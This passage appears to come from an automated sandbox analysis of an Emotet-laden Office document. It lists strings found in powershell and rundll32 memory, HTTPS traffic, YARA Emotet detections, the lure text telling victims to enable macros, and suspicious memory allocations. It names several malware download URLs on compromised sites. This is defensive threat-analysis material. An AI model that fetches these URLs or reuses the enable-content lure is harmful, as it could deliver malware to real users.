Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000005.00000002.2087509388.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092846529.0000000002900000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2096618257.000000001D4B0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2087509388.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092846529.0000000002900000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000005.00000003.2086421803.000000001D329000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000003.2085953341.000000001D380000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000005.00000002.2096244552.000000001D307000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powershell.exe, 00000005.00000002.2096237563.000000001D301000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.1
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomsta
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2088409588.0000000002F52000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/P
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000005.00000003.2086421803.000000001D329000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2094977205.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2112358022.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091794029.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2097666740.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2095245962.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2099840618.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2090614258.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091834475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106091733.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103352962.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103466457.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2088248938.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2099966335.0000000000410000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107140273.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2110865769.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2109908285.0000000000460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2112047074.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095687942.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2090414213.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 17.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.1ff0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.310000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.410000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.680000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ff0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page: I of I , words: 8,746 , ,3 , N@m 13 ;a 10096 G)
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page: I of I , words: 8,746 , ,3 , N@m 13 ;a 10096 G) FI G) ,, . i m.j
Source: Screenshot number: 8 Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8 Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Very long command line found
Source: unknown Process created: Commandline size = 5669
Source: unknown Process created: Commandline size = 5568
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5568 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
